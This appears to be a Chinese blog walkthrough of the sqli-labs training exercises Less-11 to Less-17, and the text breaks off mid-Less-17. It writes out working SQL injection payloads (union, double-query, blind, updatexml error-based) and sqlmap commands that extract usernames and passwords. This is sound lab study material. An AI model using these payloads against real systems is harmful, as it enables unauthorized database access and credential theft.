<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">




  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">




  
  
  <link rel="stylesheet" media="all" href="/lib/Han/dist/han.min.css?v=3.3">




<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">


  <link rel="manifest" href="/images/manifest.json">




  <meta name="keywords" content="sqli-labs,SQL注入,">





  <link rel="alternate" href="/atom.xml" title="煊奕" type="application/atom+xml">






<meta name="description" content="Less-11手工注入1.开始为post类型的注入，先加个单引号，报错如下。 构造出SQL语句应该为：select username,password from users where username=&amp;#39; &amp;#39;   &amp;#39; and password=&amp;#39;     2&amp;#39; limit 0,1; 也即是password字段被单引号包含了&amp;#39; and passwor">
<meta name="keywords" content="sqli-labs,SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-Labs-Less11-20">
<meta property="og:url" content="https://clwsec.top/2019/03/12/sqli-labs-Less11-20/index.html">
<meta property="og:site_name" content="煊奕">
<meta property="og:description" content="Less-11手工注入1.开始为post类型的注入，先加个单引号，报错如下。 构造出SQL语句应该为：select username,password from users where username=&amp;#39; &amp;#39;   &amp;#39; and password=&amp;#39;     2&amp;#39; limit 0,1; 也即是password字段被单引号包含了&amp;#39; and passwor">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f23ac73cb6ba3e9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-38eb6c23c53cb556.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-997151ce0a20bcfa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-90be2fc164109727.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-28a66a3210941787.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-932191fb4fab86d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f4a9b74fff06d2cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-2d5c54347ecf18eb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f3f6c68b4c547027.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-2b77ce0c8e1d5d13.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-5db9eff924b1a191.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-99e0685020238121.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-42282d6e08756d77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-0347b35bb42d9298.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-509fbf311be25a53.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-a2c07ede3c9576c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-a9887ae7011b51ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-d1b878f95a80d1d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-be055c5e78e6ca60.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-ae397955633dd198.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-a4fbd0df8cbe4a4d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-fdde6fea7fe0253f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-fac10c084ccff139.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-a445854179a5e2a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-22a805a151e67f06.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-872949fbf49ec071.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-3b8a2dd34c70530c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-e7e22cb9fc8a38cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-c9450c04670427b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f35dd602fedb0c24.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-473c69a636b3b3dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-ce8f72594aec13ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-7a46990ba48068ef.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-8b4f0d3fd2f8d3c8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-028f8d52a66c6242.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-192483d02291c94d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-692b9e86aeacf041.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-920c262677b58b4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-f0a421d41ea8f152.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-c03dceb3e7e34884.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-bc02821abe6a77e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/9216631-a0e86308216ed22c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-03-21T12:57:59.333Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Sqli-Labs-Less11-20">
<meta name="twitter:description" content="Less-11手工注入1.开始为post类型的注入，先加个单引号，报错如下。 构造出SQL语句应该为：select username,password from users where username=&amp;#39; &amp;#39;   &amp;#39; and password=&amp;#39;     2&amp;#39; limit 0,1; 也即是password字段被单引号包含了&amp;#39; and passwor">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/9216631-f23ac73cb6ba3e9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":10,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://clwsec.top/2019/03/12/sqli-labs-Less11-20/">





  <title>Sqli-Labs-Less11-20 | 煊奕</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">煊奕</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">No pains No gains</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-链接">
          <a href="/links/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            链接
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://clwsec.top/2019/03/12/sqli-labs-Less11-20/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lei">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="煊奕">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Sqli-Labs-Less11-20</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-12T21:22:28+08:00">
                2019-03-12
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2019-03-21T20:57:59+08:00">
                2019-03-21
              </time>
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQL/" itemprop="url" rel="index">
                    <span itemprop="name">SQL</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/03/12/sqli-labs-Less11-20/" class="leancloud_visitors" data-flag-title="Sqli-Labs-Less11-20">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
          
            <div class="post-wordcount">
              
                
                  <span class="post-meta-divider">|</span>
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.7k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body han-init-context" itemprop="articleBody">

      
      

      
        <h3 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h3><h4 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h4><p>1.开始为post类型的注入，先加个单引号，报错如下。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-f23ac73cb6ba3e9c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>构造出SQL语句应该为：<code>select username,password from users where username=&#39; &#39;   &#39; and password=&#39;     2&#39; limit 0,1;</code> 也即是password字段被单引号包含了<code>&#39; and password=&#39;</code>，导致 出现<code>2&#39; limit 0,1;</code>引号不匹配的情况。下图看起来更直观些。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-38eb6c23c53cb556.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>2.所以，可构造如下语句：<code>&#39;      #</code> 。 <code>#</code>把后面的都注释掉，然后在其前面加上自己构造的语句。<br>3.先用group by 看看有多少列：<code>&#39; group by 1</code>，经过测试，共2个字段。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-997151ce0a20bcfa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>4.下面，开始使用联合查询：<code>-1&#39; union select 1,2 #</code>返回正常，开始构造语句。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-90be2fc164109727.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>5.查数据库名：<code>&#39; union select 1,database() #</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-28a66a3210941787.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>6.接下来查表名，构造和<code>Less-1</code>类似：<code>&#39; union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39; #</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-932191fb4fab86d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>7.查列名<code>&#39; union select 1,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; #</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-f4a9b74fff06d2cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>8.查内容：<code>&#39; union select group_concat(username),group_concat(password) from security.users #</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-2d5c54347ecf18eb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>OK，已经得到想要的。</p>
<h4 id="用sqlmap注入"><a href="#用sqlmap注入" class="headerlink" title="用sqlmap注入"></a>用sqlmap注入</h4><p>1.首先，使用<code>BurpSuite</code>抓包，然后保存抓取到的内容。例如：保存为use.txt，把它放至某个目录下，这里为：<code>F:/temp/use.txt</code>。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-f3f6c68b4c547027.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>2.首先，判断是否存在SQL注入漏洞，<code>python2 sqlmap.py -r F:/temp/use.txt - --batch</code> 得到两个注入点，如图：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-2b77ce0c8e1d5d13.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>3.查询当前数据库<code>python2 sqlmap.py -r F:/temp/use.txt - --batch --current-db</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-5db9eff924b1a191.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>4.查询表:：<code>python2 sqlmap.py -r F:/temp/use.txt - --batch -D security --tables</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-99e0685020238121.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>5.剩下的查询和<code>Less-1</code>的用法一样，列-内容，一个一个爆即可。</p>
<hr>
<h3 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h3><p>1.加单引号，正常，加双引号，报错：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-42282d6e08756d77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>由图可知，为双引号加括号闭合。<br>2.构造：<code>&quot;)    #</code>返回正常，所以用<code>Less-11</code>构造的方法构造语句即可。即<code>&quot;)   构造的语句 #</code> 不在赘述。</p>
<hr>
<h3 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h3><p>1.加单引号，报错，知道为单引号加括号闭合。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-0347b35bb42d9298.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>2.以为就这样了，结果采用上面的构造方法无用，看来没那么简单，应该使用双查询注入了，和Less-5的构造基本相同。<br>3.查数据库，构造如下。<code>&#39;) or (select 1 from (select count(*),concat((select concat(schema_name,&#39;;&#39;) from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-509fbf311be25a53.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>继续爆其他数据库名，改变<code>limit n,1</code>即可。<br>4.查表：<code>&#39;) or (select 1 from (select count(*),concat((select concat(table_name,&#39;;&#39;) from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-a2c07ede3c9576c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>同样，改变<code>limit n,1</code>即可。<br>5.查列名：<code>&#39;) or (select 1 from (select count(*),concat((select concat(column_name,&#39;;&#39;) from information_schema.columns where table_name=&#39;users&#39; limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) #</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-a9887ae7011b51ac.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>同样，改变<code>limit n,1</code>即可。<br>6.查内容：<code>&#39;) or (select 1 from (select count(*),concat((select concat(username,&#39;: &#39;,password,&#39;;&#39;) from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-d1b878f95a80d1d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>同样，改变<code>limit n,1</code>即可。</p>
<hr>
<h3 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h3><p>1.加单引号，正常，加双引号，报错，可知为双引号闭合。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-be055c5e78e6ca60.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>2.应该不会直接是联合查询了，一试，果然还是双查询注入。<br>3.构造：<code>&quot;   构造语句   #</code> 构造语句和<code>less-13</code>一样。</p>
<hr>
<h3 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h3><p>1.加单引号，只有“报错”，应该是要盲注，而且只能布尔型或时间型了（只知道错了没压根不知道错的信息）<br><img src="https://upload-images.jianshu.io/upload_images/9216631-ae397955633dd198.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>2.不管，先把注入句式试出来，用万能句型<code>&#39; or 1=1 or &#39;1&#39;=&#39;2</code>，经过尝试，为单引号闭合，此时登录成功。<br><img src="https://upload-images.jianshu.io/upload_images/9216631-a4fbd0df8cbe4a4d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>3.开始布尔型盲注：构造<code>&#39; or 1=(if(substr(version(),1,1)=5,1,0)) or &#39;1&#39;=&#39;2</code>，其实就是把上面的<code>1=1</code>改成我们想要的语句,即先看看数据库版面是否为5。因为显示登录成功，所以说明<code>1=(if(substr(version(),1,1)=5,1,0))</code>为true。<br>4.继续构造：都是把构造好的语句替换<code>1=1</code>，从而查看结果。构造和<code>Less-6</code>差不多，不再赘述。</p>
<hr>
<h3 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h3><p>1.还是用万能句型试，最终试出为双引号加括号闭合，即使用<code>&quot;) or 1=1 or &quot;1&quot;=(&quot;2</code>登录成功。<br>2.接下来的构造和<code>Less-15</code>一样，如<code>&quot;) or 1=(if(substr(version(),1,1)=5,1,0)) or &#39;1&#39;=(&quot;2</code>。</p>
<hr>
<h3 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h3><p>1.进入页面提示为PASSWORD RESET，即重置密码界面，坑比较多。<br>2.首先，在<code>user name</code>中尝试了多次，都是让走开，后来一想，确实该走，都提示为重置密码了，还傻傻地在<code>user name</code>试，应该在<code>new password</code>中想办法。后来看了其他大佬的博客后，查看源码才知道原来对<code>user name</code>表单进行了过滤：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// take the variables</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'uname'</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">'passwd'</span>]))</span><br><span class="line">&#123;</span><br><span class="line"><span class="comment">//making sure uname is not injectable</span></span><br><span class="line">$uname=check_input($_POST[<span class="string">'uname'</span>]);  </span><br><span class="line">$passwd=$_POST[<span class="string">'passwd'</span>];</span><br></pre></td></tr></table></figure></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_input</span><span class="params">($value)</span></span></span><br><span class="line"><span class="function">	</span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(!<span class="keyword">empty</span>($value))</span><br><span class="line">		&#123;</span><br><span class="line">		<span class="comment">// truncation (see comments)</span></span><br><span class="line">		$value = substr($value,<span class="number">0</span>,<span class="number">15</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="comment">// Stripslashes if magic quotes enabled</span></span><br><span class="line">		<span class="keyword">if</span> (get_magic_quotes_gpc())</span><br><span class="line">			&#123;</span><br><span class="line">			$value = stripslashes($value);</span><br><span class="line">			&#125;</span><br><span class="line">		<span class="comment">// Quote if not a number</span></span><br><span class="line">		<span class="keyword">if</span> (!ctype_digit($value))</span><br><span class="line">			&#123;</span><br><span class="line">			$value = <span class="string">"'"</span> . mysql_real_escape_string($value) . <span class="string">"'"</span>;</span><br><span class="line">			&#125;</span><br><span class="line">	        <span class="keyword">else</span></span><br><span class="line">		&#123;</span><br><span class="line">		$value = intval($value);</span><br><span class="line">		&#125;</span><br><span class="line">	<span class="keyword">return</span> $value;</span><br></pre></td></tr></table></figure>
<p>函数<code>check_input（）</code>的作用就是检查用户输入，并将用户输入安全化，其中的<code>mysql_real_escape_string()</code>会在<code>\x00, \n, \r, \, &#39;, &quot; and \x1a</code>这些字符前加入反斜线进行转义，防止注入，而且这个函数也避免了宽字节注入的危险。</p>
<p>3.当然，还不止，<code>new password</code>也不是和之前一样轻易试出注入类型，因为有<code>user name</code>的限制，如果<code>new password</code>不对，那么怎么试都自然是错的。因为看了大佬的解题思路，知道了为单引号闭合，SQL语句为：<code>@$sql=&quot;SELECT username, password FROM users WHERE username= $uname LIMIT 0,1&quot;; $update=&quot;UPDATE users SET password = &#39;$passwd&#39; WHERE username=&#39;$row1&#39;&quot;;</code>且知道有用户名为<code>admin</code>(这个用户名一般都有)。所以就直接考虑构造了。</p>
<p>4.首先考虑到不能回显有意义的信息，所以首选前面一直用的双注入查询 构造如下：<code>user name:</code>填<code>admin</code> ,而<code>new password:</code>填<code>&#39; and (select 1 from (select count(*),concat((select concat(schema_name,&#39;;&#39;) from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-fdde6fea7fe0253f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>剩下的构造不多说，和<code>Less-13</code>一样，一个一个爆就好。<br>5.在这里，尝试使用一种新的注入方法，基于<code>extractvalue()</code>和<code>updatexml()</code>的报错注入，详情请看: <a href="https://blog.csdn.net/zpy1998zpy/article/details/80631036" target="_blank" rel="noopener">学习基于extractvalue()和updatexml()的报错注入</a>，同时，下面的注入丢默认<code>user name:</code>填<code>admin</code><br>6.先使用<code>updatexml()</code>进行注入，构造为<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select version())),1)#</code> 获取相应版本:<br><img src="https://upload-images.jianshu.io/upload_images/9216631-fac10c084ccff139.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>获取数据库名称：<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select database())),1)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-a445854179a5e2a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>获取表名：<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select concat(table_name,&#39;;&#39;) from information_schema.tables where table_schema=&#39;security&#39; limit 0,1)),1)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-22a805a151e67f06.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>改变<code>limit n,1</code>即可获取其他表名。</p>
<p>获取列名：<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select concat(column_name,&#39;;&#39;) from information_schema.columns where table_name=&#39;emails&#39; limit 0,1)),1)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-872949fbf49ec071.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>同样，改变<code>limit n,1</code>即可。</p>
<p>获取内容：这样，不行<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select concat(username,&#39;;&#39;,password) from information_schema.tables where table_name=&#39;security&#39;  limit 0,1)),1)#</code> 报错如下：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-3b8a2dd34c70530c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>这样：也不行<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select concat(username,&#39;;&#39;,password) from security.users limit 0,1)),1)#</code> 报错如下：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-e7e22cb9fc8a38cf.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
